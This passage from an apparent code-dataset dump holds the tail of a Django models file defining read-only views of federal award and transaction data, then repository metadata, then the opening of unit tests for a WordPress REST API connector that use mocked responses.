Unique Hash") action_date = models.DateField(blank=True, null=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) pulled_from = models.TextField() cfda_number = models.TextField(blank=True, null=True) cfda_title = models.TextField(blank=True, null=True) generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_view_cfda_number' class SummaryTransactionMonthView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() recipient_location_country_name = models.TextField() recipient_location_country_code = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_foreign_province = models.TextField() pop_country_name = models.TextField() pop_country_code = models.TextField() pop_state_code = models.TextField() pop_county_name = models.TextField() pop_county_code = models.TextField() pop_zip5 = models.TextField() pop_congressional_code = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() business_categories = ArrayField(models.TextField(), default=list) cfda_number = models.TextField(blank=True, null=True) cfda_title = models.TextField(blank=True, null=True) product_or_service_code = models.TextField() product_or_service_description = models.TextField() naics_code = models.TextField(blank=True, null=True) naics_description = models.TextField(blank=True, null=True) total_obl_bin = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_transaction_month_view' class SummaryTransactionGeoView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() recipient_location_country_name = models.TextField() recipient_location_country_code = models.TextField() recipient_location_state_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_foreign_province = models.TextField() pop_country_name = models.TextField() pop_country_code = models.TextField() pop_state_code = models.TextField() pop_county_name = models.TextField() pop_county_code = models.TextField() pop_zip5 = models.TextField() pop_congressional_code = models.TextField() awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_transaction_geo_view' class SummaryStateView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() distinct_awards = ArrayField(models.TextField(), default=list) pop_country_code = models.TextField() pop_state_code = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_state_view' class AwardMatview(models.Model): generated_unique_award_id = models.TextField(primary_key=True, db_column='generated_unique_award_id') latest_transaction = models.ForeignKey(to='awards.TransactionMatview', to_field='generated_unique_transaction_id', db_column='latest_transaction_unique_id', related_query_name='latest_transaction') action_date = models.TextField() agency_id = models.TextField() assistance_type = models.TextField() awarding_agency_abbr = models.TextField() awarding_agency_code = models.TextField() awarding_agency_id = models.TextField() awarding_agency_name = models.TextField() awarding_office_code = models.TextField() awarding_office_name = models.TextField() awarding_sub_tier_agency_abbr = models.TextField() awarding_sub_tier_agency_c = models.TextField() awarding_sub_tier_agency_n = models.TextField() base_and_all_options_value = models.DecimalField(max_digits=15, decimal_places=2) business_categories = ArrayField(models.TextField()) business_funds_indicator = models.TextField() business_types = models.TextField() business_types_description = models.TextField() category = models.TextField() certified_date = models.DateTimeField() cfda_number = models.TextField() cfda_objectives = models.TextField() cfda_title = models.TextField() clinger_cohen_act_pla_desc = models.TextField() clinger_cohen_act_planning = models.TextField() commercial_item_acqui_desc = models.TextField() commercial_item_acquisitio = models.TextField() commercial_item_test_desc = models.TextField() commercial_item_test_progr = models.TextField() consolidated_contract = models.TextField() consolidated_contract_desc = models.TextField() contract_award_type_desc = models.TextField() cost_or_pricing_data = models.TextField() cost_or_pricing_data_desc = models.TextField() date_signed = models.TextField() construction_wage_rate_req = models.TextField() construction_wage_rat_desc = models.TextField() description = models.TextField() dod_claimant_prog_cod_desc = models.TextField() dod_claimant_program_code = models.TextField() domestic_or_foreign_e_desc = models.TextField() domestic_or_foreign_entity = models.TextField() evaluated_preference = models.TextField() evaluated_preference_desc = models.TextField() extent_compete_description = models.TextField() extent_competed = models.TextField() fain = models.TextField() fair_opportunity_limi_desc = models.TextField() fair_opportunity_limited_s = models.TextField() fed_biz_opps = models.TextField() fed_biz_opps_description = models.TextField() fiscal_year = models.TextField() foreign_funding = models.TextField() foreign_funding_desc = models.TextField() funding_agency_abbr = models.TextField() funding_agency_code = models.TextField() funding_agency_id = models.TextField() funding_agency_name = models.TextField() funding_office_code = models.TextField() funding_office_name = models.TextField() funding_sub_tier_agency_abbr = models.TextField() funding_sub_tier_agency_co = models.TextField() funding_sub_tier_agency_na = models.TextField() idv_type = models.TextField() idv_type_description = models.TextField() information_technolog_desc = models.TextField() information_technology_com = models.TextField() interagency_contract_desc = models.TextField() interagency_contracting_au = models.TextField() last_modified_date = models.DateTimeField() major_program = models.TextField() multi_year_contract = models.TextField() multi_year_contract_desc = models.TextField() multiple_or_single_aw_desc = models.TextField() multiple_or_single_award_i = models.TextField() naics = models.TextField() naics_description = models.TextField() number_of_offers_received = models.TextField() officer_1_amount = models.TextField() officer_1_name = models.TextField() officer_2_amount = models.TextField() officer_2_name = models.TextField() officer_3_amount = models.TextField() officer_3_name = models.TextField() officer_4_amount = models.TextField() officer_4_name = models.TextField() officer_5_amount = models.TextField() officer_5_name = models.TextField() other_than_full_and_o_desc = models.TextField() other_than_full_and_open_c = models.TextField() parent_award_piid = models.TextField() parent_recipient_unique_id = models.TextField() period_of_performance_current_end_date = models.DateTimeField() period_of_performance_start_date = models.DateTimeField() piid = models.TextField() pop_city_name = models.TextField() pop_code = models.TextField() pop_congressional_code = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_foreign_province = models.TextField() pop_state_code = models.TextField() pop_state_name = models.TextField() pop_zip5 = models.TextField() potential_total_value_of_award = models.DecimalField(max_digits=15, decimal_places=2) price_evaluation_adjustmen = models.TextField() product_or_service_co_desc = models.TextField() product_or_service_code = models.TextField() program_acronym = models.TextField() program_system_or_equ_desc = models.TextField() program_system_or_equipmen = models.TextField() pulled_from = models.TextField() purchase_card_as_paym_desc = models.TextField() purchase_card_as_payment_m = models.TextField() recipient_location_address_line1 = models.TextField() recipient_location_address_line2 = models.TextField() recipient_location_address_line3 = models.TextField() recipient_location_city_code = models.TextField() recipient_location_city_name = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_foreign_city_name = models.TextField() recipient_location_foreign_postal_code = models.TextField() recipient_location_foreign_province = models.TextField() recipient_location_state_code = models.TextField() recipient_location_state_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_name = models.TextField() recipient_unique_id = models.TextField() record_type = models.IntegerField() referenced_idv_agency_desc = models.TextField() referenced_idv_agency_iden = models.TextField() sai_number = models.TextField() sea_transportation = models.TextField() sea_transportation_desc = models.TextField() labor_standards = models.TextField() labor_standards_descrip = models.TextField() small_business_competitive = models.TextField() solicitation_identifier = models.TextField() solicitation_procedur_desc = models.TextField() solicitation_procedures = models.TextField() subaward_count = models.IntegerField() subcontracting_plan = models.TextField() subcontracting_plan_desc = models.TextField() total_obligation = models.DecimalField(max_digits=15, decimal_places=2) total_outlay = models.DecimalField(max_digits=15, decimal_places=2) total_subaward_amount = models.DecimalField(max_digits=15, decimal_places=2) total_subsidy_cost = models.DecimalField(max_digits=20, decimal_places=2, null=True, blank=True) total_loan_value = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) type = models.TextField() type_description = models.TextField() type_of_contract_pric_desc = models.TextField() type_of_contract_pricing = models.TextField() type_of_idc = models.TextField() type_of_idc_description = models.TextField() type_set_aside = models.TextField() type_set_aside_description = models.TextField() uri = models.TextField() materials_supplies_article = models.TextField() materials_supplies_descrip = models.TextField() class Meta: managed = False db_table = 'award_matview' class AwardCategory(models.Model): type_code = models.TextField() type_name = models.TextField() class Meta: managed = False db_table = 'award_category' class TransactionMatview(models.Model): generated_unique_transaction_id = models.TextField(primary_key=True, db_column='generated_unique_transaction_id') award = models.ForeignKey(to='awards.AwardMatview', to_field='generated_unique_award_id', db_column='generated_unique_award_id', related_query_name='award') action_date = models.DateTimeField() agency_id = models.TextField() assistance_type = models.TextField() award_description = models.TextField() award_modification_amendme = models.TextField() awardee_or_recipient_legal = models.TextField() awardee_or_recipient_uniqu = models.TextField() awarding_agency_code = models.TextField() awarding_agency_name = models.TextField() awarding_sub_tier_agency_c = models.TextField() awarding_sub_tier_agency_n = models.TextField() awarding_office_code = models.TextField() awarding_office_name = models.TextField() base_and_all_options_value = models.DecimalField(max_digits=15, decimal_places=2) business_funds_indicator = models.TextField() business_types = models.TextField() business_types_description = models.TextField() cfda_number = models.TextField() cfda_title = models.TextField() contract_award_type = models.TextField() contract_award_type_desc = models.TextField() extent_compete_description = models.TextField() extent_competed = models.TextField() fain = models.TextField() federal_action_obligation = models.DecimalField(max_digits=15, decimal_places=2) funding_agency_code = models.TextField() funding_agency_name = models.TextField() funding_sub_tier_agency_co = models.TextField() funding_sub_tier_agency_na = models.TextField() funding_office_code = models.TextField() funding_office_name = models.TextField() idv_type = models.TextField() idv_type_description = models.TextField() last_modified_date = models.TextField() naics = models.TextField() naics_description = models.TextField() original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) parent_award_piid = models.TextField() period_of_performance_curr = models.DateTimeField() period_of_performance_star = models.DateTimeField() piid = models.TextField() pop_city_name = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_state_code = models.TextField() pop_state_name = models.TextField() pop_congressional_code = models.TextField() pop_zip5 = models.TextField() product_or_service_co_desc = models.TextField() product_or_service_code = models.TextField() pulled_from = models.TextField() recipient_location_address_line1 = models.TextField() recipient_location_address_line2 = models.TextField() recipient_location_address_line3 = models.TextField() recipient_location_city_name = models.TextField() recipient_location_congressional_code = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_foreign_province = models.TextField() recipient_location_state_code = models.TextField() recipient_location_state_name = models.TextField() recipient_location_zip5 = models.TextField() record_type = models.IntegerField() referenced_idv_agency_iden = models.TextField() referenced_idv_type = models.TextField() referenced_idv_type_desc = models.TextField() sai_number = models.TextField() transaction_number = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() type_set_aside_description = models.TextField() uri = models.TextField() class Meta: managed = False db_table = 'transaction_matview' class SubawardView(models.Model): subaward = models.OneToOneField(Subaward, primary_key=True, on_delete=models.deletion.DO_NOTHING) keyword_ts_vector = SearchVectorField() award_ts_vector = SearchVectorField() recipient_name_ts_vector = SearchVectorField() latest_transaction_id = models.IntegerField() last_modified_date = models.DateField() subaward_number = models.TextField() amount = models.DecimalField(max_digits=20, decimal_places=2) total_obl_bin = models.TextField() description = models.TextField(null=True, blank=True) fiscal_year = models.IntegerField() action_date = models.DateField() award_report_fy_month = models.IntegerField() award_report_fy_year = models.IntegerField() # award = models.OneToOneField(Award, primary_key=True) award = models.OneToOneField(Award, primary_key=True) awarding_agency_id = models.IntegerField() funding_agency_id = models.IntegerField() awarding_toptier_agency_name = models.TextField() awarding_subtier_agency_name = models.TextField() funding_toptier_agency_name = models.TextField() funding_subtier_agency_name = models.TextField() awarding_toptier_agency_abbreviation = models.TextField() funding_toptier_agency_abbreviation = models.TextField() awarding_subtier_agency_abbreviation = models.TextField() funding_subtier_agency_abbreviation = models.TextField() recipient_unique_id = models.TextField() recipient_name = models.TextField() dba_name = models.TextField() parent_recipient_unique_id = models.TextField() parent_recipient_name = models.TextField() business_type_code = models.TextField() business_type_description = models.TextField() award_type = models.TextField() prime_award_type = models.TextField() cfda_id = models.IntegerField() piid = models.TextField() fain = models.TextField() business_categories = ArrayField(models.TextField(), default=list) prime_recipient_name = models.TextField() pulled_from = models.TextField() type_of_contract_pricing = models.TextField() type_set_aside = models.TextField() extent_competed = models.TextField() product_or_service_code = models.TextField() product_or_service_description = models.TextField() cfda_number = models.TextField() cfda_title = models.TextField() recipient_location_country_code = models.TextField() recipient_location_country_name = models.TextField() recipient_location_city_name = models.TextField() recipient_location_state_code = models.TextField() recipient_location_state_name = models.TextField() recipient_location_county_code = models.TextField() recipient_location_county_name = models.TextField() recipient_location_zip5 = models.TextField() recipient_location_street_address = models.TextField() recipient_location_congressional_code = models.TextField() pop_country_code = models.TextField() pop_country_name = models.TextField() pop_state_code = models.TextField() pop_state_name = models.TextField() pop_county_code = models.TextField() pop_county_name = models.TextField() pop_city_code = models.TextField() pop_city_name = models.TextField() pop_zip5 = models.TextField() pop_street_address = models.TextField() pop_congressional_code = models.TextField() class Meta: managed = False db_table = 'subaward_view' class SummaryTransactionRecipientView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") action_date = models.DateField() fiscal_year = models.IntegerField() type = models.TextField() pulled_from = models.TextField() recipient_hash = models.UUIDField() recipient_name = models.TextField() recipient_unique_id = models.TextField() parent_recipient_unique_id = models.TextField() generated_pragmatic_obligation = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) federal_action_obligation = models.DecimalField(max_digits=20, decimal_places=2, blank=True, null=True) original_loan_subsidy_cost = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) face_value_loan_guarantee = models.DecimalField(max_digits=23, decimal_places=2, null=True, blank=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_transaction_recipient_view' class SummaryAwardRecipientView(models.Model): duh = models.UUIDField(primary_key=True, help_text="Deterministic Unique Hash") date_signed = models.DateField(blank=False) action_date = models.DateField(blank=True) fiscal_year = models.IntegerField() type = models.TextField(blank=True, null=True) recipient_hash = models.UUIDField(null=True) parent_recipient_unique_id = models.TextField(blank=True, null=True) counts = models.IntegerField() class Meta: managed = False db_table = 'summary_award_recipient_view'
45.625571
117
0.760283
4,602
39,968
6.251847
0.067145
0.267978
0.066699
0.083417
0.863682
0.822043
0.789962
0.77029
0.739946
0.709708
0
0.006512
0.150871
39,968
875
118
45.677714
0.84124
0.001326
0
0.738065
0
0
0.022198
0.011425
0
0
0
0
0
1
0
false
0
0.007742
0
0.938065
0
0
0
0
null
1
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
9
98f096566c27b8ecba3ea4d3107dc85b534aa66f
75,248
py
Python
wordpress_api/tests.py
kallewesterling/django-wordpress-api
856ab95ce83345e21f801d59967d3afb6bdf9250
[ "MIT" ]
18
2016-09-02T16:04:25.000Z
2020-10-23T01:27:49.000Z
wordpress_api/tests.py
ImaginaryLandscape/django-wordpress-api
1dd205d095b6f637779cc437ffa8b6004e40075a
[ "MIT" ]
11
2017-01-11T20:37:29.000Z
2022-03-23T20:19:04.000Z
wordpress_api/tests.py
ImaginaryLandscape/django-wordpress-api
1dd205d095b6f637779cc437ffa8b6004e40075a
[ "MIT" ]
9
2016-10-27T14:17:48.000Z
2021-04-23T15:31:56.000Z
# !/usr/bin/env python # -*- coding: utf-8 -*- import responses from django.urls import reverse from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.test import TestCase, override_settings, Client from wordpress_api.utils import WPApiConnector """ test_django-wordpress-api ------------ Tests for `django-wordpress-api` models module. """ class TestUtils(TestCase): """ Tests for wordpress_api.utils """ @responses.activate def setUp(self): responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') self.connector = WPApiConnector() self.default_response_kwargs = { 'json': {'success': 'something found'}, 'status': 200, 'content_type': 'application/json', } def test_connector_load_meta_data(self): """ if load_meta_data is False, the wordpress metadata should be empty """ connector = WPApiConnector(load_meta_data=False) self.assertFalse(connector.authors) self.assertFalse(connector.categories) self.assertFalse(connector.tags) def test_connector_gets_all_authors(self): """ connector object should have the authors as one of its properties """ self.assertTrue(self.connector.authors is not None) self.assertTrue('test-slug' in self.connector.authors) self.assertEqual(self.connector.authors['test-slug']['id'], 2) @override_settings(WP_URL='') def test_raises_error_if_no_api_url(self): """ If the wp_api url is not defined, utils should return a message with configuration error. """ with self.assertRaises(ImproperlyConfigured): WPApiConnector() @responses.activate def test_connection_returns_error(self): """ If server cannot be reached a message with server error should be returned """ connector = self.connector posts = connector.get_posts() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', status=404, content_type='application/json') posts = self.connector.get_posts() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates_authors(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=404, content_type='application/json') authors = self.connector.get_authors() self.assertTrue('server_error' in authors.keys()) @responses.activate def test_authors_gets_several_pages(self): """ When the endpoint returns several pages, the get_authors method should get all the data from all the pages """ responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ "id": 2, "name": "test-slug-2", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug-2", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') authors = self.connector.get_authors() self.assertEqual(2, len(authors.keys())) @responses.activate def test_connection_error_propagates(self): """ When we get a connection error from the server, an error indicating that something happened along with the status code is required. """ posts = self.connector.get_posts() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates_get_tags(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=404, content_type='application/json') posts = self.connector.get_tags() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_tags_gets_several_pages(self): """ When the endpoint returns several pages, the get_tags method should get all the data from all the pages """ responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 1, 'description': '', 'id': 1, 'link': 'https://example.com/blog/tag/test/', 'meta': [], 'name': 'test 2', 'slug': 'test-2', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/post_tag' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/tags' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [{ 'href': 'https://example.com/wp-json/wp/v2/tags/1' }], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?tags=1' } ] }, 'taxonomy': 'post_tag'}], content_type='application/json') tags = self.connector.get_tags() self.assertEqual(2, len(tags)) @responses.activate def test_connection_error_propagates_get_tags(self): """ When we get a connection error from the server, an error indicating that something happened along with the status code is required. """ posts = self.connector.get_tags() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_error_status_propagates_get_categories(self): """ When we get a non 200 status from the server, an error indicating that something happened along with the status code is required. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=404, content_type='application/json') posts = self.connector.get_categories() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_connection_error_propagates_get_categories(self): """ When we get a connection error from the server, an error indicating that something happened along with the status code is required. """ posts = self.connector.get_categories() self.assertTrue('server_error' in posts.keys()) @responses.activate def test_categories_gets_several_pages(self): """ When the endpoint returns several pages, the get_categories method should get all the data from all the pages """ responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test', 'slug': 'test', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/categories/', status=200, headers={'X-WP-TotalPages': "2"}, json=[{ 'count': 4, 'description': '', 'id': 1, 'link': 'https://example.com/blog/category/test/', 'meta': [], 'name': 'test 2', 'slug': 'test-2', '_links': { 'about': [ { 'href': 'https://example.com/wp-json/wp/v2/taxonomies/category' } ], 'collection': [ { 'href': 'https://example.com/wp-json/wp/v2/categories' } ], 'curies': [ { 'href': 'https://api.w.org/{rel}', 'name': 'wp', 'templated': True } ], 'self': [ { 'href': 'https://example.com/wp-json/wp/v2/categories/1' } ], 'wp:post_type': [ { 'href': 'https://example.com/wp-json/wp/v2/posts?categories=1' } ] }, 'taxonomy': 'category'}], content_type='application/json') categories = self.connector.get_categories() self.assertEqual(2, len(categories)) @responses.activate def test_connector_uses_orderby(self): """ By default orderby is defined to be date. It can be something else (like title) and the query should be changed accordingly. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts() self.assertTrue( 'orderby=date' in posts['headers']['request_url']) posts = self.connector.get_posts(orderby='title') self.assertTrue( 'orderby=title' in posts['headers']['request_url']) @responses.activate def test_page_number_is_used(self): """ Page number is 1 by default. If it is an int it gets used. If it is None it gets ignored. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts() self.assertTrue('page=1' in posts['headers']['request_url']) posts = self.connector.get_posts(page_number=10) self.assertTrue('page=10' in posts['headers']['request_url']) posts = self.connector.get_posts(page_number=None) self.assertTrue('page=' not in posts['headers']['request_url']) @responses.activate def test_extra_filters(self): """ If filter_type and filter_content are passed as arguments, they are taken in account for the query to the server. Otherwise ignored. """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts( wp_filter={'some_filter': 'some_content'}) self.assertTrue( 'some_filter=some_content' in posts[ 'headers']['request_url']) @responses.activate def test_custom_types(self): """ If custom type is defined, it should be used, otherwise ignored """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) posts = self.connector.get_posts() self.assertTrue('type=' not in posts['headers']['request_url']) posts = self.connector.get_posts(custom_type='glossary') self.assertTrue('type=glossary' in posts['headers']['request_url']) class TestViews(TestCase): """ Tests for wordpress_api.views """ def setUp(self): self.default_response_kwargs = { 'json': [{ "tags": [ 1 ], "categories": [ 1 ], "_embedded": { "author": [ { "id": 12, "name": "test-slug", "url": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, } ], "wp:featuredmedia": [ { "id": 4543, } ], }, 'excerpt': 'test blog', 'slug': 'test-blog', 'date': '2007-01-25T12:00:00Z', 'author': {'name': 'test', 'slug': 'test-slug'}, 'terms': { 'post_tag': [{'slug': 'test-tag', 'name': 'test tag'}], 'category': [{'slug': 'test-category', 'name': 'test category'}] }, 'date_gmt': '2007-01-25T12:00:00Z', }], 'status': 200, 'content_type': 'application/json', 'adding_headers': {'X-WP-Total': '1', 'X-WP-TotalPages': '1'}, } self.client = Client() # BlogListView @responses.activate def test_blog_list_view_return_200(self): """ If the wp client gets information, it should return a 200 """ responses.add(responses.GET, settings.WP_URL + 'wp-json/wp/v2/posts/', **self.default_response_kwargs) responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/users/', status=200, json=[{ "id": 2, "name": "test-slug", "url": "", "description": "", "link": "https://example.com/blog/author/test-slug/", "slug": "test-slug", "avatar_urls": { "24": "https://example.com/test-avatar", }, "meta": [], "_links": { "self": [ { "href": "https://example.com/wp-json/wp/v2/users/2" } ], "collection": [ { "href": "https://example.com/wp-json/wp/v2/users" } ] } }], content_type='application/json') responses.add( responses.GET, settings.WP_URL + 'wp-json/wp/v2/tags/', status=200, json=[{ 